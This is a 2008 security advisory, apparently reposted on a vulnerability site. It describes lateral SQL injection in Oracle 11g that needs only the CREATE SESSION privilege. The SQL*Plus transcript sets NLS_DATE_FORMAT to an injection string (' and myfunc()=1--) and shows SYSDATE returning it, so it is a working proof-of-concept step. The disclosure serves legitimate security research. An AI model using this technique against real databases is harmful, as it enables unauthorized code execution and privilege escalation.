Lateral SQL Injection Revisited - No Special Privs Required

2008.07.18
Credit: David Litchfield
Risk: Medium
Local: No
Remote: No
CVE: N/A
CWE: CWE-89

At the end of April 2008 I published a paper about a new class of flaw in Oracle entitled "Lateral SQL Injection". The paper can be found here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf Essentially the paper details a way in which the attacker can manipulate the environment to trick an Oracle database into using arbitrary SQL in DATE functions and data. A number of people at the time dismissed it as irrelevant because the attacker required the ALTER SESSIOn privilege. Well, as it turns out, you don't need the ALTER SESSION privilege at all. Here's why: there are certain ALTER SESSION statements that can be executed even though the user doesn't have the ALTER SESSION privilege. The statements that can be executed without the privilege include those that relate to National Language Support. Thus a user without ALTER SESSION privileges can change the date format and so employ a lateral SQL injection attack. The script below shows this in action. We connect to a fully patched 11g server and confirm we only have CREATE SESSION privileges - i.e. the minimum we need to connect to the server - everyone gets this privilege. We then issue an ALTER SESSION statement to try set SQL_TRACE to true. As expected this fails with an insufficient privileges error. But then we issues an ALTER SESSION to set the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function to confirm it took. C:>sqlplus /nolog SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008 Copyright (c) 1982, 2007, Oracle. All rights reserved. SQL> connect testuser1/testuser1 Connected. SQL> select * from session_privs; PRIVILEGE ---------------------------------------- CREATE SESSION SQL> alter session set sql_trace = true; alter session set sql_trace = true * ERROR at line 1: ORA-01031: insufficient privileges SQL> alter session set nls_date_format='"'' and myfunc()=1--"'; Session altered. SQL> select sysdate from dual; SYSDATE ------------------ ' and myfunc()=1-- SQL> Thus we can see that no special privileges are required to effect a lateral SQL injection attack. I suppose I should have spotted this at the time. Cheers, David

References:

http://seclists.org/fulldisclosure/2008/Jul/0317.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top